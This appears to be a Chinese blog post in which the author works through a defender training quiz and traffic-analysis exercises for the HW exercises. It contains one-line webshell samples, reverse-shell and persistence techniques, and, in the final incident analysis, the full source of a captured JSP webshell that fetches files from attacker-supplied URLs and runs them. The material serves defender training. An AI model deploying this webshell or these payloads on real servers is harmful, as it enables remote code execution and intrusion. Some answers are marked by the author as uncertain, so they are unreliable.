HW-某份HW防守方题目练习

HW防守

Posted by Silence on June 14, 2020

因个人水平有限,不完全保证答案一定正确,解析一定严谨无误,请谨慎参考。
如果有错误之处请及时指出,以免误导他人,更希望各位前辈师傅多多指导。

理论题目

题目

理论题-普通难度
1. 查找Webshell的有以下哪几种?()
A、根据脚本文件创建时间筛选(正确答案)
B、使用D盾Webshell查杀工具进行扫描(正确答案)
C、grep命令遍历搜索敏感函数关键词(正确答案)
D、使用痕迹恢复工具查找最近删除的脚本文件(正确答案)

2. 以下哪几种是DNS的解析类型?()
A、A记录(正确答案)
B、NS记录(正确答案)
C、TXT记录(正确答案)
D、CNAME记录(正确答案)

3. 网站的真实路径一般可以通过什么方式获得?()
A、尝试在提交字段里插入各种类型数据引发应用服务器报错(正确答案)
B、Sql注入导致报错(正确答案)
C、SYN Flood DDOS攻击导致服务报错显示
D、探测CMS从而猜测路径(正确答案)

4. 以下哪几种措施可以避免一部分XSS漏洞问题?()
A、返回输出通过 HTML 转义(正确答案)
B、建立黑名单,过滤常见的XSS语句(正确答案)
C、改成纯前端渲染,把代码和数据分隔开(正确答案)
D、使用类似于org.owasp.encoder(java)的默认函数(正确答案)

5. 通过Sql注入能实现的功能有哪些?()
A、窃取数据库数据(正确答案)
B、文件写入(正确答案)
C、命令执行(正确答案)
D、修改代码(正确答案)

6. 以下哪些Nmap参数是正确的?()
A、-sU : 以UDP的数据包格式进行扫描(正确答案)
B、-sT : 扫描TCP数据包已建立的连接connect()(正确答案)
C、-sP : 以ping的方式进行扫描(正确答案)
D、-F 慢速扫描

7. 以下哪些黑客工具会在开始扫描时发送产品特征?(例如在HTTP-head头里发送nmap的网址)()
A、AWVS(正确答案)
B、IBM-Scan(正确答案)
C、Sqlmap(正确答案)
D、Nessus(正确答案)

8. 在客户现场遇到无法解答的产品问题该怎么办?()
A、向客户解释这一方面自己并不了解,立即找产品对接人沟通,随后将标准答案回复客户(正确答案)
B、回复客户不知道
C、对于能实操验证的产品问题先自己验证下再回复客户(正确答案)
D、回复客户自己是临时工,让客户找产品经理询问

9. 遇到可疑的数据包,但是无法判断是否为攻击,下一步应该?()
A、Google搜索该数据包的关键词,尝试自己寻找答案(正确答案)
B、通知客户先封禁IP,分析不了就算了
C、放弃分析,跳过此告警
D、将告警截图、对应数据发至公司请求协助(正确答案)

10. 现场公司产品发生故障如何处理?()
A、第一时间联系公司,反馈故障具体现象(正确答案)
B、自己尝试排除是否为网络或操作失误现象(正确答案)
C、觉得很新鲜,在现场广而告之
D、第一时间通知客户,让客户联系公司处理

11. 以下哪种方式可以保持Webshell权限不掉?()
A、Mysql触发器后门(正确答案)
B、通过NTFS交换数据流文件实现文件隐藏(正确答案)
C、设置定时任务(正确答案)
D、Tomcat环境下在Jsp文件编译后删除,利用Tomcat机制,进行源码调试,欺骗Tomcat文件依然存在(正确答案)

12. 调研目标时关于目标相关敏感文件搜索来源()?
A、Github(正确答案)
B、Google(正确答案)
C、百度网盘(正确答案)
D、P2P搜索(正确答案)

13. 以下哪些为流量抓包分析软件?()
A、Tcpdump(正确答案)
B、wireshark(正确答案)
C、burpsuit(正确答案)
D、NetworkMiner(正确答案)

14. 发现恶意软件后以下哪些分析方法是正确的?()
A、上传至沙箱进行动态分析(正确答案)
B、在本机运行抓包分析
C、计算MD5查询威胁情报(正确答案)
D、逆向分析(正确答案)

15. 以下哪个一句话木马代码无法执行?() [单选题]
A、<?php eval(@$_POST['a']); ?>
B、<%execute(unescape("eval%20request%28%22aaa%22%29"))%>
C、<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
D、<%eval @request["pass"];%>(正确答案)

16. DNS协议属于OSI7层模型中的哪一层?() [单选题]
A、网际层协议
B、传输层协议
C、应用层协议(正确答案)
D、数据链路层

17. 在护网过程中发现成功告警,以下哪种处理方法是不正确的?() [单选题]
A、仔细核查设备告警,确认攻击者是否漏洞利用成功
B、使用客户的网络尝试使用同样的payload进行漏洞复测(正确答案)
C、编写简单一句话描述发送给客户,联系客户进行应急响应
D、遇到如何独立判断的情况第一时间联系公司请求协助
答案解析:鼓励进行漏洞复测,但是不能在未给客户报备的情况下使用客户的IP对漏洞进行复测,容易导致其他护网人员认为复测的是来自于内网的攻击,造成不必要的麻烦


18. 下列那一项HTTP的请求方法是错误的?() [单选题]
A、GET
B、PUT
C、OPTIONS
D、INT(正确答案)

19. DNS协议默认服务端端口为()? [单选题]
A、53(正确答案)
B、1023
C、25
D、110

20. 以下哪个的默认版本是双向流量加密的Webshell?() [单选题]
A、ASPXspy系列大马
B、Behinder(冰蝎)(正确答案)
C、菜刀
D、蚁剑

21. HTTP头中的host字段截包篡改为IP,可能依然能正常访问目标网站 [单选题]
对(正确答案)
错

22. 设置CDN和域名的CNAME解析记录相关 [单选题]
对(正确答案)
错

23. Webshell可以使用HTTPS协议访问 [单选题]
对(正确答案)
错

24. SSL校验证书绑定(ssl pinning)是为了防止中间人攻击 [单选题]
对(正确答案)
错

25. Wireshark不能还原HTTP上传流量中的上传文件 [单选题]
对
错(正确答案)

26. APR欺骗有可能会导致网络中断 [单选题]
对(正确答案)
错

27. 反弹类型漏洞利用后未上线,可以说明目标不存在此漏洞 [单选题]
对
错(正确答案)

28. 常规端口扫描和半开放式扫描的区别是 [单选题]
A、 没什么区别
B、 没有完成三次握手,缺少ACK过程(正确答案)
C、 半开放式采用UDP方式扫描
D、 扫描准确性不一样

29. 如何防御包含漏洞,以下说法错误的是 [单选题]
A、避免由外界制定文件名
B、文件名中要包含目录名(正确答案)
C、限制包含的文件范围
D、对于远程文件包含,设置php.ini配置文件中allow_url_include = off

30. 入侵检测是一门新兴的安全技术,是作为继()之后的第二层安全防护措施。 [单选题]
A、路由器
B、交换机
C、防火墙(正确答案)
D、服务器

31. 以下哪种工具不可以对网站进行自动化 Web 漏洞扫描?() [单选题]
A、Hackbar(正确答案)
B、AWVS
C、IBM Appscan
D、Nikto

32. Linux 环境下,查看日志文件的最后 100 行数据,正确的方式是?() [单选题]
A、mv -100 log
B、grep -100 log
C、cat -100 log
D、tail -100 log(正确答案)

33. Linux基础命令中,使用哪一个命令是创建计划任务?() [单选题]
A、crontab(正确答案)
B、mkdir
C、chown
D、Mount

34. Linux中一般哪些文件是必须使用root权限查看的?()
A、/etc/shadow(正确答案)
B、/root/.bash_history(正确答案)
C、/etc/passwd
D、/var/log/alternatives.log(正确答案)

35. Windows日志默认保存哪些?()
A、账号登录日志(正确答案)
B、powershell操作日志
C、系统报错(正确答案)
D、权限切换(正确答案)

36. 以下哪些代理/Vpn属于全局代理?()
A、Socks5
B、L2TP(正确答案)
C、PPTP(正确答案)
D、HTTP

37. CDN一般会在HTTP-Head头中添加一下哪些字段作为显示原始来源IP()?
A、Cdn-Src-Ip(正确答案)
B、X-Forwarded-For(正确答案)
C、Referer
D、From

38. Linux上反弹shell的手段一般有?()
A、nc反弹(正确答案)
B、tunnel脚本隧道(正确答案)
C、openssl加密bash(正确答案)
D、softether

39. Linux上查询目前在线或者历史登录的方法有?()
A、w(正确答案)
B、last(正确答案)
C、who /var/log/wtmp(正确答案)
D、netstat

40. wireshark支持哪几种方式的关键词搜索?()
A、YAML
B、字符串(正确答案)
C、正则(正确答案)
D、十六进制(正确答案)

41. 以下哪几种维度可以独立判断攻击是否成功?()
A、HTTP返回200
B、回显请求包中执行的命令(正确答案)
C、无响应
D、目标主机往回发送SYN请求(正确答案)

42. 尝试利用漏洞命令执行从VPS下载提权工具,但VPS无发现下载日志,可能的情况是?()
A、目标主机DNS受限,部分域名无法访问(正确答案)
B、目标主机所在区域防火墙禁止对外访问(正确答案)
C、目标主机存在HIDS,删除了下载的软件
D、漏洞未利用成功(正确答案)

43. DNS只有UDP的方式传输 [单选题]
对
错(正确答案)

44. ICMP可以利用多余的data空间传输数据,俗称ICMP隧道 [单选题]
对(正确答案)
错

45. 获取子域名的方式有以下哪些?
A、通过字典爆破(正确答案)
B、通过Google搜索引擎获取历史URL(正确答案)
C、DNS域传送漏洞(正确答案)
D、IP反查域名(正确答案)

46. 下列哪种漏洞单独利用不能getshell [单选题]
A、SQL注入
B、命令执行
C、XSS(正确答案)
D、反序列化漏洞

47. 下列哪一个漏洞不是利用的HTTP协议 [单选题]
A、CVE-2017-10271 Weblogic XMLDecoder 反序列化漏洞
B、CVE-2020-1938 Tomcat文件包含漏洞(正确答案)
C、CVE-2017-5638 Struts2-045远程代码执行漏洞
D、CVE-2017-12149 JBoss反序列化漏洞

48. 用户收到一封可疑邮件,要求提供银行卡号及密码。该邮件属于什么类型邮件? [单选题]
A、正常邮件
B、钓鱼邮件(正确答案)
C、恶意附件邮件
D、结构异常邮件

49. 下列哪些页面可能不是webshell [单选题]
A、包含读取目录,文件信息,执行系统命令
B、只有执行系统命令功能
C、文件浏览功能(正确答案)
D、服务器信息页面,代理反弹功能,连接数据库功能,执行命令功能

50. 通过查询IP信息,下列哪个是攻击队IP的可能性最大 [单选题]
A、曾经被威胁情报标记恶意攻击,垃圾邮件
B、曾经绑定过多个域名
C、只开放了一个22端口,没有其他信息(正确答案)
D、80端口运行着门户网站

51. 下列哪个是CVE-2017-10271漏洞利用URL路径 [单选题]
A、/console/login/LoginForm.jsp
B、/uddiexplorer/SearchPublicRegistries.jsp
C、/_async/AsyncResponseService
D、/wls-wsat/CoordinatorPortType(正确答案)

52. 发现HTTP请求中存在X-Forwarded-For如何判断真实IP [单选题]
A、根据负载均衡或CDN情况判断(正确答案)
B、XFF字段的最后一个IP
C、XFF字段第一个IP
D、忽略XFF,网络层才是真实IP

53. 下列关于GET和POST提交方法描述正确的是 [单选题]
A、GET请求提交的数据在理论上没有长度限制
B、POST请求数据在地址栏内不可见(正确答案)
C、POST请求对发送的数据的长度限制在240~255个字符
D、GET请求提交数据更加安全

54. 下列哪项为webshell的系统权限 [单选题]
A、管理员权限
B、随机权限
C、中间件所使用的系统权限(正确答案)
D、无权限

55. 下列哪个选项不属于命令执行漏洞的危害? [单选题]
A、反弹shell
B、控制服务器
C、继承Web服务程序的权限去执行系统命令或读写文件
D、获取管理员账号cookie(正确答案)

56. 下列哪项不是黑客工具菜刀的功能 [单选题]
A、Socks5代理进内网(正确答案)
B、文件管理
C、执行命令
D、连接数据库

57. 下列哪项是黑客工具冰蝎的加密方式 [单选题]
A、base64
B、md5
C、RC4
D、AES(正确答案)

58. 下列哪个工具进行代理转发是加密的 [单选题]
A、lcx
B、earthwarm
C、ssh(正确答案)
D、regeorg

59. web目录扫描用下列哪种方式扫描最快 [单选题]
A、POST
B、GET
C、PUT
D、HEAD(正确答案)

60. 下列哪个工具不是检测webshell的 [单选题]
A、D盾
B、河马
C、Sangfor WebShellKill
D、rootkit(正确答案)

61. 下列哪些函数为PHP webshell可用命令执行函数?
A、eval(正确答案)
B、assert(正确答案)
C、exec(正确答案)
D、passthru(正确答案)

62. 下列哪些方法有可能绕过CDN获取到真实IP
A、直接ping域名
B、查找域名历史绑定记录(正确答案)
C、DDOS攻击(正确答案)
D、命令执行漏洞获取IP(正确答案)

63. 为什么分析流量的时候看到某个网页访问返回200,自己复现访问时却返回500或者不能访问
A、User-Agent和流量中的不同(正确答案)
B、该网页已经做过更改(正确答案)
C、浏览器缓存
D、负载均衡将自己的访问代理到了另一台服务器(正确答案)

64. 为什么WAF告警了SQL注入攻击,其他安全设备却没有告警
A、WAF和其他安全设备防护对象不同(正确答案)
B、WAF有该条攻击的检测规则,其他安全设备漏报(正确答案)
C、WAF误报(正确答案)
D、WAF在最前面拦截了此次攻击(正确答案)

65. 无回显命令执行漏洞怎么检测是否利用成功
A、无法检测
B、利用DNSlog接收回传数据(正确答案)
C、放弃
D、利用curl访问自己web服务器,查看是否存在相关日志(正确答案)

66. 存在命令执行漏洞如何拿到webshell
A、系统命令echo写入webshell(正确答案)
B、wget从外网下载webshell至服务器(正确答案)
C、无法拿到webshell
D、在源web文件中插入webshell代码(正确答案)

67. webshell可能存在服务器下列哪些地方
A、CPU
B、硬盘(正确答案)
C、内存(正确答案)
D、电源

68. 一次web攻击,HTTP状态码返回404一定攻击失败 [单选题]
对
错(正确答案)

69. weblogic服务一定是7001端口 [单选题]
对
错(正确答案)

70. 黑客使用0day漏洞攻击也有可能被检测到 [单选题]
对(正确答案)
错

71. 黑客使用代理IP就不会被追溯到真实IP [单选题]
对
错(正确答案)

72. 目标ping不通则无法与该服务器进行任何通信 [单选题]
对
错(正确答案)

73. webshell文件只能是php,jsp,asp等脚本后缀的文件 [单选题]
对
错(正确答案)

74. SQL注入可执行系统命令 [单选题]
对(正确答案)
错

75. 冰蝎可以连接一句话木马 [单选题]
对
错(正确答案)

76. SQL注入漏洞只能获取数据库数据 [单选题]
对
错(正确答案)

77. 内存webshell无法清除 [单选题]
对
错(正确答案)

78. 服务器无法连接互联网,XSS不能获取账号cookie [单选题]
对
错(正确答案)

79. windows日志被清除后无法恢复 [单选题]
对
错(正确答案)

80. 文件aaa的内容如下:1001:1 
1002:2 
1003:1 
1004:2
期望处理aaa文件得到以下输入结果:
1001
1003
以下命令能满足的有() *
A、grep "1$" aaa | awk -d: '{print $1}'
B、grep "1$" aaa | cut -d: -f0
C、sed '/:2/d' aaa | sed 's/:2//g'
D、awk -F: '{if ($2==1){print $1}}' aaa(正确答案)



个人解答(谨慎参考)

1.A网站的代码写好以后一般不会轻易在更改,如果有创建时间比较近的有可能是黑客攻击时创建的后门;BC不解释;D选项例如java写的后面文件编译后就驻留在内存中,所以需要恢复被删文件查看
2.DNS的解析记录:windows上可用nslookup对应去查
A记录: 将域名指向一个IPv4地址(例如:100.100.100.100),需要增加A记录
CNAME记录: 如果将域名指向一个域名,实现与被指向域名相同的访问效果,需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名,常为CDN的地址
MX记录: 建立电子邮箱服务,将指向邮件服务器地址,需要设置MX记录。建立邮箱时,一般会根据邮箱服务商提供的MX记录填写此记录
NS记录: 域名解析服务器记录,如果要将子域名指定某个域名服务器来解析,需要设置NS记录
TXT记录: 可任意填写,可为空。一般做一些验证记录时会使用此项,如:做SPF(反垃圾邮件)记录
AAAA记录: 将主机名(或域名)指向一个IPv6地址(例如:ff03:0:0:0:0:0:0:c1),需要添加AAAA记录
SRV记录: 添加服务记录服务器服务记录时会添加此项,SRV记录了哪台计算机提供了哪个服务。格式为:服务的名字.协议的类型(例如:_example-server._tcp)。
SOA记录: SOA叫做起始授权机构记录,NS用于标识多台域名解析服务器,SOA记录用于在众多NS记录中那一台是主服务器
PTR记录: PTR记录是A记录的逆向记录,又称做IP反查记录或指针记录,负责将IP反向解析为域名
3.报错会暴露出文件绝对地址;CMS的路径是确定的,可以用来猜测;DDOS攻击,服务器都崩了,网页都看不到了还怎么看地址?
4.转义;过滤;代码和数据严格分开;使用专门开发的编码函数
5.基础知识
6.基础知识,忘记了就--help吧
7.扫描器在URL,HTTP-Head,body等字段均会有不同程度的特征。软件要求
8.常识问题
9.常识问题
10.常识问题
11.mysql触发器,可以在数据库写一条特殊的语句,然后用我们可以控制的和数据库的交互点,比如提交文章,评论等等重新生成后门。通过NTFS可以建立特殊的文件隐藏用作后门。定时任务定时写文件。jsp编译后,代码不落地存在于内存中,不清内存不重启就一直存在。
12.常识问题
13.基础知识
14.基础知识。沙箱安全分析(如,md5查询历史上是否出现过相似恶意软件,逆向分析行为
15.多了个;不能执行??存疑
16.DNS是应用层的协议,同在应用层的还有
17.需要特别注意:鼓励进行漏洞复测,但是不能在未给客户报备的情况下使用客户的IP对漏洞进行复测,容易导致其他护网人员认为复测的是来自于内网的攻击,造成不必要的麻烦
18.基础知识
19.基础知识
20.冰蝎通信前会通过与服务器的交互得出通信所需密钥,两端发送的数据都加密
21.省去DNS解析
22.DN服务开启后会有一个CNMAE解析记录,可将该解析记录加为域名解析的别名
23.不解释
24.密码学的相关基础知识
25.导出对象即可还原
26.攻击者不进行转发的话,受害者会断网
27.原因很多,不能简单判断为不存在漏洞
28.经验积累
29.通过绝对路径获取文件,不允许目录跳转
30.入侵检测IDS,入侵防御系统IPS。
防火墙可视为路由器访问控制功能的专业化产品。而IPS可以提供防火墙所未有的应用层的安全防护功能,但IPS无法防御未知攻击。IPS在线部署,流量必须经过,IDS为旁路部署可以大范围监控。
31.hackbar只是浏览器插件不具备漏洞扫描功能
32.tail命令
33.crontab命令
34.B是执行命令记录,D是更新替代信息
35.基础知识
36.PPTP,L2TP是VPN的协议可以做全局,所有应用的流量全走代理
37.AB都可以获取真实客户端IP,referer字段是指出从那个页面跳转而来,没有from字段
38.前三个均正确,第四个是科学上网的工具
39.基础知识
40.基础知识
41.基础知识
42.C删除了就说明已经下载成功了,是有记录的
43.DNS在进行区域传输的时候使用TCP,普通的查询使用UDP
44.新型的用于搭建通信隧道的方式,有些企业内网不禁止ICMP包,因此可用于传输数据
45.基础知识
46.xss无法直接获取服务器权限
47.CVE-2020-1938是tomcat的的AJP协议存在缺陷而导致,攻击者可以构造特定参数读取服务器webapp目录下任意文件
48.基础知识
49.只能浏览文件,也可能是服务端代码提供
50.攻击队的VPS,只开放一个22做ssh的用。其他的选项描述的可能是黑灰产用过的IP。可以在阿布云上购买代理IP服务
51.CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞,触发漏洞url如下: http://192.168.xx.xx:7001/wls-wsat/CoordinatorPortType  post数据包,通过构造构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞
52.X-Forwarded-For字段,第一个为客户端IP,此后的IP都为代理IP
53.网络常识
54.谁运行就是谁的权限
55.常识
56.基础知识,用过就知道
57.冰蝎使用AES加密,会在正式执行命令前与服务器通信交换密钥而后用于通信加密。
58.常识,用过就知道
59.网络常识
60.rootkit的主要功能是隐藏其他程序进程的软件。更多的作为驱动程序,加载到操作系统内核中的恶意软件
61.全部可用
62.B:在该站还为上CDN前,历史上解析过的IP可能为真实IP;C:通过DDOS攻击,消耗服务器资源,该站点购买的CDN资源不够用的时候就会直接将请求传递给真实IP站点;D通过命令执行漏洞向公网请求出口IP即可得到真实IP。
63.基础知识
64.基础知识,防护时误报也是不得不考虑的事情。因此在大业务上不会出现大规模禁IP的操作
65.DNSLOG是一种可以用于外带信息的方式;请求自己服务器,如果有日志可推断可以执行命令
66.常识
67.基础知识
68.状态码404有可能是服务器的统一配置,有错误返回404
69.可以改端口
70.使用的0day攻击有可能触发某些规则,但是仍然需要人工判断
71.常识
72.ping不通是ICMP,可以使用别的协议通信
73.基础知识
74.SQL注入可以执行系统命令。在sql server中可以使用xp_cmdshell逐渐来执行系统命令。
在MySQL中可通过udf.dll来执行系统命令。
75.冰蝎有专用木马
76.SQL注入漏洞也可以用于执行命令,写文件,不仅仅是获取数据库内的数据。
77.内存webshell,重启即可
78.服务器无法连接互联网,但是依旧可以在内网环境中发起HTTP请求,然后发送cookie等相关信息。
79.如果有备份可以恢复,也可以通过技术手段进行恢复
80.在运维过程中常用的几个Linux截取命令:awk,cut,sed,grep
原选项均存在一定问题,个人在原选项基础上修改为:
A、	grep “1$” aaa | awk -F : ‘{print $1}’
B、	grep “1$” aaa | cut -d: -f1
C、	 sed '/:2/d' aaa | sed 's/:1//g'
D、	awk -F: '{if ($2==1){print $1}}' aaa

实操题目

题目所需的流量包在此:流量包

题目

一、安全分析人员发现自己单位被人入侵了,通过安全设备抓取到一部分黑客攻击流量。请分析该流量包[黑客入侵pcap流量包.pcapng],写出黑客入侵过程中获取的数据(注意:写出获取数据的详细值)
二、安全分析人员发现门户网站被植入webshell,请分析四个流量包,分别写出四个流量包的的类型和名称。
三、某单位一台主机感染了病毒,通过安全设备抓取了该主机的流量,请分析流量包[病毒流量包]回答如下问题:
1.该主机感染了什么病毒:
2.该病毒可能是怎么感染的:
3.病毒在该计算机上执行了什么?
4.病毒最后访问了什么网站?
四、请以两段话分别概括一下两个流量包中的攻击事件,包括此攻击事件的黑客攻击目的,攻击源IP身份溯源,使用的漏洞等

个人解答(谨慎参考)

实操题:
一、安全分析人员发现自己单位被人入侵了,通过安全设备抓取到一部分黑客攻击流量。请分析该流量包[黑客入侵pcap流量包.pcapng],写出黑客入侵过程中获取的数据(注意:写出获取数据的详细值)

解题步骤:
1.下载得到流量包,丢进wireshark 2.在过滤器中输入http可以看到一堆的sql盲注语句,猜测应为sql注入获取了特殊值 流量界面 3.既然都是单独的页面,可以在wireshark中的导出对象中更为直观的看到盲注后不同页面的大小区别。当然在原界面通过length也能看到不同响应包的区别,但是不够直观。 导出对象 4.依次得到这些ascii值,丢进python转换可以得到flag{c2bbf9cecdaf656cf524d014c5bf046c} 恢复字符

二、安全分析人员发现门户网站被植入webshell,请分析四个流量包,分别写出四个流量包的的类型和名称。

1.第一个 大马:phpwebshell.php,密码为eanver 导出文件 导出所有文件,对html进行查看 大马 由此可推断出该木马为一大马

2.第二个 普通木马:update.php 连接密码:abc 普通马 3.第三个 菜刀马:update.php 密码:abc 能够很明显的看出菜刀马的特征,将数据包在->||-<内 菜刀马 4.第四个 冰蝎马:shell目录下的shell.php 密码:aaa 前期建立密钥: bbf8bd054a164518和c51e059fae941fef 建立通信 后面开始正式利用: 开始利用 三、某单位一台主机感染了病毒,通过安全设备抓取了该主机的流量,请分析流量包[病毒流量包]回答如下问题:
1.该主机感染了什么病毒:Ursnif
2.该病毒可能是怎么感染的:通过邮件
3.病毒在该计算机上执行了什么?
4.病毒最后访问了什么网站?www.bing.com
下面是分析过程:

四、请以两段话分别概括一下两个流量包中的攻击事件,包括此攻击事件的黑客攻击目的,攻击源IP身份溯源,使用的漏洞等


222.77.203.105pcap包
攻击目的:通过恶意文件从远程主机下载并运行
IP溯源:218.61.233.226,辽宁省丹东市联通 溯源 通过微步威胁情报可获知如下信息: 威胁情报 使用漏洞:猜测应为CVE-2017-12615,Tomcat的PUT上传漏洞
攻击过程:
在2020年6月9日12:05:56时攻击者上传了该恶意文件
分析过程:
打开流量包跟踪HTTP流,可以看到攻击者通过PUT请求向服务上传了一个名为FxCodeShell.jsp的恶意文件。
猜测应为CVE-2017-12615的Tomcat的PUT上传漏洞。
恶意文件名为:FxCodeShell.php,密码为:FxxkMyLie1836710Aa

## FxCodeShell.php
<%@ page import="java.util.Arrays"%>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*,java.util.*,java.net.URL,java.net.HttpURLConnection"%>
<%
	String view = request.getParameter("view");
	if (view == null || view.equals("")) {
		String localOS = System.getProperty("os.name");
		List<String> osList;
		String tomcatOS = "0";
		String DEFAULT = "0";
		String WINDOWS = "1";
		String LINUX = "2";
		osList = new ArrayList<String>();
		osList.add("Linux");
		osList.add("Windows");
		for (String os : osList) {
			if (localOS.contains(os)) {
				if (os.equals("Linux")) {
					tomcatOS = LINUX;
				} else if (os.equals("Windows")) {
					tomcatOS = WINDOWS;
				} else {
					tomcatOS = DEFAULT;
				}
				break;
			}
		}
		out.write(tomcatOS + "<br/>");
		response.setHeader("OS", tomcatOS);
		return;
	}
%>

<%
	String password = "FxxkMyLie1836710Aa";
	if (!view.equals(password)) {
		return;
	}
	int systemCode = Integer.parseInt(request.getParameter("os"));
	String address = request.getParameter("address");
	String fileName = null;
	String path = null;
	String winPath = "%SystemRoot%/Temp/";
	String linuxPath = "/var/tmp/";
	switch (systemCode) {
	case 1:
		path = winPath;
		break;
	default:
		path = linuxPath;
		break;
	}

	String[] urls = address.split(",");
	InputStream fileInputSteam = null;
	FileOutputStream fileOutputStream = null;
	for (int i = 0; i <= urls.length - 1; i++) {
		try {
			String[] file = urls[i].split("/");
			fileName = file[file.length - 1];
			out.write("Download:" + urls[i] + "<br>");
			out.write("<br>filename:" + fileName + "<br>");
			out.write("<br>Size:" + urls.length + "<br>");
			out.write(
					"-------------------------------------------------------------------------------------------------------"
							+ "<br><br>");
			File isfile = new File(path + fileName);
			if (isfile.isFile()) {
				try {
					Runtime exec = Runtime.getRuntime();
					if (systemCode == 1) {
						exec.exec(path + fileName);
					} else {
						String chmod = "chmod 777 " + path + fileName;
						exec.exec(chmod);
						exec.exec("nohup " + path + fileName + " > /dev/null 2>&1 &");
					}
				} catch (Exception e1) {
					e1.printStackTrace();
				}
				continue;
			}
			URL downloadUrl = new URL(urls[i]);
			HttpURLConnection conn = (HttpURLConnection) downloadUrl.openConnection();
			conn.setConnectTimeout(60000 * 3);
			conn.setReadTimeout(60000 * 3);
			fileInputSteam = conn.getInputStream();
			fileOutputStream = new FileOutputStream(path + fileName);
			int length = -1;
			byte[] b = new byte[409600];
			while ((length = fileInputSteam.read(b)) != -1) {
				fileOutputStream.write(b, 0, length);
				fileOutputStream.flush();
			}
			if (conn != null) {
				conn.disconnect();
			}
			if (fileInputSteam != null) {
				fileInputSteam.close();
			}
			if (fileOutputStream != null) {
				fileOutputStream.close();
			}
			Runtime exec = Runtime.getRuntime();
			if (systemCode == 1) {
				exec.exec(path + fileName);
			} else {
				String chmod = "chmod 777 " + path + fileName;
				exec.exec(chmod);
				exec.exec("nohup " + path + fileName + " > /dev/null 2>&1 &");
			}
		} catch (Exception e2) {
			e2.printStackTrace();
		}
	}
%>

该恶意文件的主要行为是通过address参数指定的地址上下载文件,并且执行该文件。
该文件会根据Windows和Linux不同平台分别按照不同的方式执行。
Windows平台上直接执行,在Linux平台上会通过”nohup”放入后台执行,不管正确错误一律把输出信息丢弃。


没还分析完,不清楚用了什么洞 180.97.215.22包
攻击目的:
IP溯源:180.97.215.22,中国江苏镇江
溯源 通过微步威胁情报: 威胁情报 使用漏洞:CVE-2006-0248,CNNVD-200601-187 攻击过程: 分析过程: